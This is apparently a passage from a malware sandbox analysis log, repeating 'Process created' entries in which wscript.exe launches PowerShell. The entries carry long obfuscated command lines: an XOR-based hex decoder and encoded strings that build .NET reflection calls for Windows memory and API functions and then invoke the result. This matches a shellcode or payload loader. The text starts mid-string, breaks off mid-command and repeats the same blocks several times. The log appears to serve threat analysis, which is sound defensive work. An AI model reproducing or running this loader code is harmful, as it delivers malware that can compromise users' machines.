sk'skade8sh9decprash1ri8sc0va8re9ko8co0sc8da2st8af4by9sy1mi8af0subho1st9fecfl9an5ma8ob0cl'tr;fo`$besbatdiyanrsukreewatoprsunthest1ch=ashbetlibsk le'spama6hs8mo9no8da4ha9sa6ve9po6stcun9kocne5enbsq5pi9st0lo8rn7ch8tw9ud8brchy8fo6uncfu9rocph5prbpa6tm8fe0mi8or4bl8pr9ra8fa0pr8us1glcly9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$hs); $bytes = new-object byte[] ($hs.length / 2); for($i=0; $i -lt $hs.length; $i+=2){ $bytes[$i/2] = [convert]::tobyte($hs.substring($i, 2), 16); $bytes[$i/2] = ($bytes[$i/2] -bxor 229); } [string][system.text.encoding]::ascii.getstring($bytes);}$hdlc0=htb 'b69c96918088cb818989';$hdlc1=htb 'a88c86978a968a8391cbb28c8bd6d7cbb08b96848380ab84918c9380a880918d8a8196';$hdlc2=htb 'a28091b5978a86a4818197809696';$hdlc3=htb 'b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083';$hdlc4=htb '9691978c8b82';$hdlc5=htb 'a28091a88a81908980ad848b818980';$hdlc6=htb 'b7b1b69580868c8489ab848880c9c5ad8c8180a79cb68c82c9c5b59087898c86';$hdlc7=htb 'b7908b918c8880c9c5a8848b84828081';$hdlc8=htb 'b78083898086918081a180898082849180';$hdlc9=htb 'ac8ba880888a979ca88a81908980';$styrketrne0=htb 'a89ca180898082849180b19c9580';$styrketrne1=htb 'a689849696c9c5b59087898c86c9c5b68084898081c9c5a48b968ca689849696c9c5a490918aa689849696';$styrketrne2=htb 'ac8b938a8e80';$styrketrne3=htb 'b59087898c86c9c5ad8c8180a79cb68c82c9c5ab8092b6898a91c9c5b38c9791908489';$styrketrne4=htb 'b38c9791908489a489898a86';$styrketrne5=htb '8b91818989';$styrketrne6=htb 'ab91b5978a91808691b38c9791908489a880888a979c';$styrketrne7=htb 'aca0bd';$styrketrne8=htb 'b9';function fkp {param ($v_m, $v_p) ;$leucifer0 =htb 'c193908b88c5d8c5cdbea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba28091a49696808887898c8096cdccc599c5b28d809780c8aa878f808691c59ec5c1bacba2898a878489a49696808887899ca684868d80c5c8a48b81c5c1bacba98a8684918c8a8bcbb695898c91cdc1b6919c978e8091978b80ddccbec8d4b8cba09490848996cdc1ad818986d5ccc598cccba28091b19c9580cdc1ad818986d4cc';&($styrketrne7) $leucifer0;$leucifer5 = htb 'c1938497ba829584c5d8c5c193908b88cba28091a880918d8a81cdc1ad818986d7c9c5beb19c9580beb8b8c5a5cdc1ad818986d6c9c5c1ad818986d1cccc';&($styrketrne7) $leucifer5;$leucifer1 = htb '97809190978bc5c1938497ba829584cbac8b938a8e80cdc18b908989c9c5a5cdbeb69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083b8cdab8092c8aa878f808691c5b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083cdcdab8092c8aa878f808691c5ac8b91b59197ccc9c5cdc193908b88cba28091a880918d8a81cdc1ad818986d0cccccbac8b938a8e80cdc18b908989c9c5a5cdc193ba88ccccccccc9c5c193ba95cccc';&($styrketrne7) $leucifer1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $var_parameters,[parameter(position = 1)] [type] $vrt = [void]);$leucifer2 = htb 'c1b3b1a7c5d8c5bea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba180838c8b80a19c8b84888c86a49696808887899ccdcdab8092c8aa878f808691c5b69c96918088cbb78083898086918c8a8bcba49696808887899cab848880cdc1ad818986ddccccc9c5beb69c96918088cbb78083898086918c8a8bcba0888c91cba49696808887899ca7908c89818097a48686809696b8dfdfb7908bcccba180838c8b80a19c8b84888c86a88a81908980cdc1ad818986dcc9c5c
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$damspils = """refgrukonnacsktdoikloutnhe grhshtpubmi mi{g ud ho pr hvpflarurnoavamso(st[desbotorrmoiannbogph]di`$hihstsbl)ro;pa ni vn ra sa`$inbvoyuntalesisbe sp=af unnbregrwkr-byocabomjcyeuncbytor prbglyfotprest[be]av fa(fo`$alhdesst.milquerinpegbathahge te/un ev2me)ta;sm op fo st chfmookurun(sc`$haidr=di0pr;is ly`$haipo sn-ovlkitco dy`$flhspspe.gylskeoknbrgcatsahal;ko sp`$deitr+da=sk2ak)la{ma sp wh ko gu va st ba pt`$prbudysttauebesur[hy`$odist/kf2ar]re ka=de ku[abcfootonpavtoeudrcotfu]je:bo:sptstoskbglygrtpreur(su`$uihdesno.casprucobovspotwerhyilintrgcu(st`$maima,le di2my)in,pa pa1az6no)ju;co ba rn`$gabopytitstebosdi[au`$eliad/as2ma]pa ve=tr sh(ci`$spbaaytetoxebosin[ra`$maiom/ba2am]bo do-tibdixglomorpa en2fr0ba1om)he;au vg re mr as}mi mi[suskktturspifanmagov]en[grsinyhyscltcaestmin.sttpoeudxuntko.reeafnthcunotrdariunnregta]be:ka:ovaslstrcpaiexibr.digsaehatmisoutalrspitansugbi(me`$elbinyettinemassu)ci;by}mi`$inrhaegrcovagilsycteioptrhrriahitdieme0pi=lihomtexbov sn'ho9thasnbvi0vabaaarabcidplacocgyavo4opein7weakodpeaex5opafr5cu'bi;ge`$emrafebycdiaemluncheiaptrirexahetstebe1lb=guhdatgebsk le'di8rg4lyapr0inaviaspbrebboaco6sibslakoafi6scabrfmiblidsiemo7be9laeunast0biako7wrfcaaunfstbhoech7ra9chcpaabe7skbadapaatr8huakefskadockn8sk7maapr8robcrdfoape0meblafscajucno8te4boarecspbdiddeaun1biati6tuawedhebilari'im;ga`$horisemiccaachlpocfoitrtberdeafltfoexx2ma=ruhmetovbno pi'ru8lyeraaobcmybandun9in9anbidbbaahy6wiaspaun8pa8joabidflasvdfabdabciabichabjaaprbanafo'ju;sa`$mtrthehichyaunlcycseidetnorsnaebtteedy3ge=urhmatphbbu ex'si9adabebna0olbmiaskbbodbramucunaru4hoech7be9sybfobuscopaun7fabundspaop0haaan4kiarecsresm7ga8ro0doagl7tibfodglasicyobsubdeajo6flbai9af9maakiaspcsabfjbgabfrfbnasw0ovaweacuatectoblaaouefo7sa8se1inati8spaec7deafodsaaop5foaalcgi9cybfiareckladrffe'ko;be`$tormaeprcnoainlrecetimatinrwiakotaleex4ga=fohtitbabwe un'ovbtrahebindilbpybfaaev0koabe7amasteun'fo;co`$skrseevacobabrlincryidetgrrwhachtfoera5ba=cchsptanbpr au'in8vgefnapacypbmodom8kl4raamu6deacodhubhicsnahy5loagecud8th1trafl8inaen7taaundbuael5afakacre'un;af`$gardeebocmyamelmackvioptmirheatrtpaesa6pl=hehomtkibul ea'ku9svbub9lidge9neasubfe9foanaclaainaheafy0foakh8caatr5un8to7flaen8koahe4doabicdiebl5hieoi9ha8po1maafl0alataddiacicaf8gibspbca0ra9buaduaae0udacaesjetr5goeha9op9ma9stbexcwoastbkrarn5beafl0amaaraaf'uk;jo`$terbaerecnaaholdrcjeiomtimrouanotsoeko7re=suhxytrubta tr'na9libfobscchuade7aabgrdjuaca0foagi4anarecgleyo5maeka9or8mi4deain8moasj7euath8fuafoeimamecunabedgi'ty;do`$terflevacinameluocpuiovtwirleakntmnean8st=tihpatpabst st'tn9libchanoclyajoflyaas5diafacviadmabobcadopalvcgaahidpr8hadvaapocovapo5taanoccraprescaci8mebapdnoakacly'st;un`$smrfiesicseaseldicpaivatrarteapotreedr9ov=mehdotsibst ca'ta8os0glano7ro8ch4peatrcreaop4beast6aabaabilbal0en8st4hoafe6yearadlsbexcunaun5prapocde'fo;ro`$stdnoegomfgasugcynkiereteviamzpaalmbblludepl0co=pahaltagbki ma'ba8dr4nobsy0sa8todhuafrcteat
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$badeanstalt = """refliuefnbrcextapihjostnbu hyhfltdubsp su{hi cl an pa bapinacarziasomvo(cz[pasdetalrcaiennougde]ca`$udhbasud)fr;ag at ud ho af`$usbeuyaktnoepasbo sa=sn thnanenowbo-muogrbepjloeddcbethu tobpayvrtseela[al]po bd(me`$vahtnsde.relpeenonvegmatunhsl re/sk di2gi)ko;un ge ma is gefflolerwi(fe`$haiop=om0pe;fu ma`$phido ge-maltitse fa`$syhbesba.dolunedenscgdotunhca;do un`$reiom+re=be2du)va{fl pl re ad ot ta sp sk ho`$dobfeydetleegassm[fi`$geiaf/na2de]od ge=sa tr[recskounnlivkresirortbr]il:me:datdiodibboypatglesu(po`$ushhesph.bosfruafbnesmatunrpriponungla(il`$stipa,su jo2po)ca,bl af1sn6du)no;ma te un`$mibkryprtchegtspa[du`$syiun/tr2fi]mi ta=ha ah(fo`$sibbiyintopeovsol[kb`$spihe/ar2fr]fe ci-frbrexenophrti hy2st2re9la)lo;so le de ca vr}re un[muskutsqrlaiapnnogbl]pe[maschyinsdetpaenemst.vatbaekaxibtbi.reemanplcgeourdprimonprgsy]si:ko:raaudsakcwaifoisa.mogbaebuttasgutunrfriulningba(ba`$fobseypittheansid)li;bl}ga`$dehbrdsaluncir0sk=krhoutbebaf ry'bebre6te9spcbe9be6pr9gr1js8et0am8in8secenbca8co1in8ta9pr8cr9de'sy;lu`$plhrvdaflfocin1de=trhditzibve un'feakr8re8tacde8sl6gr9ag7is8xyasv9sp6sh8caahe8de3bl9an1unctibtebab2ha8smcur8subcudbu6lkdti7macmebsebde0as8trbch9ah6me8to4pr8ne3fr8in0boarebra8st4ti9ve1un8apcop9dk3bi8co0suacl8an8en0un9in1mo8dedan8peaud8wu1ra9ca6ba'fo;el`$lohbldnolsucbo2ne=tnhbltunbsp ne'siafi2sk8ti0di9ul1tyblo5ob9fi7no8byace8an6poala4da8bi1ka8im1wh9gt7lo8ge0rr9br6br9di6ar'fl;gr`$cyheidarlblcpr3pr=ovhentnobco ta'lebun6re9upcgu9sn6gn9fa1br8mo0da8pr8lycovbbebwa7sk9fo0sa8mabde9ev1af8kacba8oc8sc8he0nocobbfoatocde8sibsi9se1be8or0se9no7fl8huaou9ty5rabco6kr8sk0dd9se7as9ri3le8lacbr8we6ou8di0oc9be6dackabteaundpu8se4st8isber8si1ja8ng9li8sp0fobdi7ci8ex0vi8st3sl'sk;de`$flhpedjaljdcti4ki=klhsttprbfo ge'th9fi6af9sy1af9re7he8crcwi8fobst8ov2be'bl;al`$anhindaclfocbu5ta=ovhdetwhbun ca'udade2sy8pi0in9af1caari8ha8prano8sl1py9du0gn8ki9ud8po0muaundne8no4ud8epbac8vi1bj8sp9st8op0an'af;se`$orhbydgrlcicfo6hm=cehsktinbha di'fabin7apbin1wabbe6em9re5sa8no0wo8ai6mi8micba8pa4sh8el9noastbfo8un4ko8om8lo8ro0stcfo9chcco5syajudag8afcco8in1ps8in0frami7se9lactabbr6er8ticap8hu2pocep9suclo5mibre5ps9no0wa8ko7st8sa9po8fuccr8eg6no'in;hu`$inhcadudlrocst7mi=rehprtrobze da'nebpa7ri9di0un8chbgn9ea1ku8skcme8pr8su8di0ovcka9mocsa5swaud8un8bl4si8dibly8un4ur8gl2fa8fi0wh8ne1sc'wa;dd`$dehopdselnocaz8tr=byhditsibpy ev'avbun7di8tr0om8in3ma8fr9pr8ud0pr8fe6tr9br1sl8mi0gr8in1biave1hy8sv0ur8hv9pl8bl0kl8ph2ni8se4fa9fy1xy8ch0na'sa;dr`$cohafddolvocen9nd=pihkotasbef in'psaprcgl8mubfeata8fo8kp0un8re8co8uname9bl7at9glcfoafr8ny8elami8ek1fy9st0ek8mi9he8vr0me're;sv`$resactinykarrekgoeartunrhynwaemu0ov=inhaltetbbo sk'skade8sh9decprash1ri8sc0va8re9ko8co0sc8da2st8af4by9sy1mi8af0subho1st9fecfl9an5ma8ob0cl'tr;fo`$besbatdiyanrsukreewatoprsunthest1ch=ashbetlibsk le'spama6hs8mo9no8da4ha9sa6ve9po6stcun9kocne5enbsq5pi9st0lo8rn7ch8tw9ud8brchy8fo6uncfu9rocph5prbpa6tm8fe0mi8or4bl8pr9ra8fa0pr8us1glcly9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function htb { param([string]$hs); $bytes = new-object byte[] ($hs.length / 2); for($i=0; $i -lt $hs.length; $i+=2){ $bytes[$i/2] = [convert]::tobyte($hs.substring($i, 2), 16); $bytes[$i/2] = ($bytes[$i/2] -bxor 229); } [string][system.text.encoding]::ascii.getstring($bytes);}$hdlc0=htb 'b69c96918088cb818989';$hdlc1=htb 'a88c86978a968a8391cbb28c8bd6d7cbb08b96848380ab84918c9380a880918d8a8196';$hdlc2=htb 'a28091b5978a86a4818197809696';$hdlc3=htb 'b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083';$hdlc4=htb '9691978c8b82';$hdlc5=htb 'a28091a88a81908980ad848b818980';$hdlc6=htb 'b7b1b69580868c8489ab848880c9c5ad8c8180a79cb68c82c9c5b59087898c86';$hdlc7=htb 'b7908b918c8880c9c5a8848b84828081';$hdlc8=htb 'b78083898086918081a180898082849180';$hdlc9=htb 'ac8ba880888a979ca88a81908980';$styrketrne0=htb 'a89ca180898082849180b19c9580';$styrketrne1=htb 'a689849696c9c5b59087898c86c9c5b68084898081c9c5a48b968ca689849696c9c5a490918aa689849696';$styrketrne2=htb 'ac8b938a8e80';$styrketrne3=htb 'b59087898c86c9c5ad8c8180a79cb68c82c9c5ab8092b6898a91c9c5b38c9791908489';$styrketrne4=htb 'b38c9791908489a489898a86';$styrketrne5=htb '8b91818989';$styrketrne6=htb 'ab91b5978a91808691b38c9791908489a880888a979c';$styrketrne7=htb 'aca0bd';$styrketrne8=htb 'b9';function fkp {param ($v_m, $v_p) ;$leucifer0 =htb 'c193908b88c5d8c5cdbea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba28091a49696808887898c8096cdccc599c5b28d809780c8aa878f808691c59ec5c1bacba2898a878489a49696808887899ca684868d80c5c8a48b81c5c1bacba98a8684918c8a8bcbb695898c91cdc1b6919c978e8091978b80ddccbec8d4b8cba09490848996cdc1ad818986d5ccc598cccba28091b19c9580cdc1ad818986d4cc';&($styrketrne7) $leucifer0;$leucifer5 = htb 'c1938497ba829584c5d8c5c193908b88cba28091a880918d8a81cdc1ad818986d7c9c5beb19c9580beb8b8c5a5cdc1ad818986d6c9c5c1ad818986d1cccc';&($styrketrne7) $leucifer5;$leucifer1 = htb '97809190978bc5c1938497ba829584cbac8b938a8e80cdc18b908989c9c5a5cdbeb69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083b8cdab8092c8aa878f808691c5b69c96918088cbb7908b918c8880cbac8b9180978a95b68097938c868096cbad848b818980b78083cdcdab8092c8aa878f808691c5ac8b91b59197ccc9c5cdc193908b88cba28091a880918d8a81cdc1ad818986d0cccccbac8b938a8e80cdc18b908989c9c5a5cdc193ba88ccccccccc9c5c193ba95cccc';&($styrketrne7) $leucifer1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $var_parameters,[parameter(position = 1)] [type] $vrt = [void]);$leucifer2 = htb 'c1b3b1a7c5d8c5bea49595a18a88848c8bb8dfdfa6909797808b91a18a88848c8bcba180838c8b80a19c8b84888c86a49696808887899ccdcdab8092c8aa878f808691c5b69c96918088cbb78083898086918c8a8bcba49696808887899cab848880cdc1ad818986ddccccc9c5beb69c96918088cbb78083898086918c8a8bcba0888c91cba49696808887899ca7908c89818097a48686809696b8dfdfb7908bcccba180838c8b80a19c8b84888c86a88a81908980cdc1ad818986dcc9c5c
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$damspils = """refgrukonnacsktdoikloutnhe grhshtpubmi mi{g ud ho pr hvpflarurnoavamso(st[desbotorrmoiannbogph]di`$hihstsbl)ro;pa ni vn ra sa`$inbvoyuntalesisbe sp=af unnbregrwkr-byocabomjcyeuncbytor prbglyfotprest[be]av fa(fo`$alhdesst.milquerinpegbathahge te/un ev2me)ta;sm op fo st chfmookurun(sc`$haidr=di0pr;is ly`$haipo sn-ovlkitco dy`$flhspspe.gylskeoknbrgcatsahal;ko sp`$deitr+da=sk2ak)la{ma sp wh ko gu va st ba pt`$prbudysttauebesur[hy`$odist/kf2ar]re ka=de ku[abcfootonpavtoeudrcotfu]je:bo:sptstoskbglygrtpreur(su`$uihdesno.casprucobovspotwerhyilintrgcu(st`$maima,le di2my)in,pa pa1az6no)ju;co ba rn`$gabopytitstebosdi[au`$eliad/as2ma]pa ve=tr sh(ci`$spbaaytetoxebosin[ra`$maiom/ba2am]bo do-tibdixglomorpa en2fr0ba1om)he;au vg re mr as}mi mi[suskktturspifanmagov]en[grsinyhyscltcaestmin.sttpoeudxuntko.reeafnthcunotrdariunnregta]be:ka:ovaslstrcpaiexibr.digsaehatmisoutalrspitansugbi(me`$elbinyettinemassu)ci;by}mi`$inrhaegrcovagilsycteioptrhrriahitdieme0pi=lihomtexbov sn'ho9thasnbvi0vabaaarabcidplacocgyavo4opein7weakodpeaex5opafr5cu'bi;ge`$emrafebycdiaemluncheiaptrirexahetstebe1lb=guhdatgebsk le'di8rg4lyapr0inaviaspbrebboaco6sibslakoafi6scabrfmiblidsiemo7be9laeunast0biako7wrfcaaunfstbhoech7ra9chcpaabe7skbadapaatr8huakefskadockn8sk7maapr8robcrdfoape0meblafscajucno8te4boarecspbdiddeaun1biati6tuawedhebilari'im;ga`$horisemiccaachlpocfoitrtberdeafltfoexx2ma=ruhmetovbno pi'ru8lyeraaobcmybandun9in9anbidbbaahy6wiaspaun8pa8joabidflasvdfabdabciabichabjaaprbanafo'ju;sa`$mtrthehichyaunlcycseidetnorsnaebtteedy3ge=urhmatphbbu ex'si9adabebna0olbmiaskbbodbramucunaru4hoech7be9sybfobuscopaun7fabundspaop0haaan4kiarecsresm7ga8ro0doagl7tibfodglasicyobsubdeajo6flbai9af9maakiaspcsabfjbgabfrfbnasw0ovaweacuatectoblaaouefo7sa8se1inati8spaec7deafodsaaop5foaalcgi9cybfiareckladrffe'ko;be`$tormaeprcnoainlrecetimatinrwiakotaleex4ga=fohtitbabwe un'ovbtrahebindilbpybfaaev0koabe7amasteun'fo;co`$skrseevacobabrlincryidetgrrwhachtfoera5ba=cchsptanbpr au'in8vgefnapacypbmodom8kl4raamu6deacodhubhicsnahy5loagecud8th1trafl8inaen7taaundbuael5afakacre'un;af`$gardeebocmyamelmackvioptmirheatrtpaesa6pl=hehomtkibul ea'ku9svbub9lidge9neasubfe9foanaclaainaheafy0foakh8caatr5un8to7flaen8koahe4doabicdiebl5hieoi9ha8po1maafl0alataddiacicaf8gibspbca0ra9buaduaae0udacaesjetr5goeha9op9ma9stbexcwoastbkrarn5beafl0amaaraaf'uk;jo`$terbaerecnaaholdrcjeiomtimrouanotsoeko7re=suhxytrubta tr'na9libfobscchuade7aabgrdjuaca0foagi4anarecgleyo5maeka9or8mi4deain8moasj7euath8fuafoeimamecunabedgi'ty;do`$terflevacinameluocpuiovtwirleakntmnean8st=tihpatpabst st'tn9libchanoclyajoflyaas5diafacviadmabobcadopalvcgaahidpr8hadvaapocovapo5taanoccraprescaci8mebapdnoakacly'st;un`$smrfiesicseaseldicpaivatrarteapotreedr9ov=mehdotsibst ca'ta8os0glano7ro8ch4peatrcreaop4beast6aabaabilbal0en8st4hoafe6yearadlsbexcunaun5prapocde'fo;ro`$stdnoegomfgasugcynkiereteviamzpaalmbblludepl0co=pahaltagbki ma'ba8dr4nobsy0sa8todhuafrcteat
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 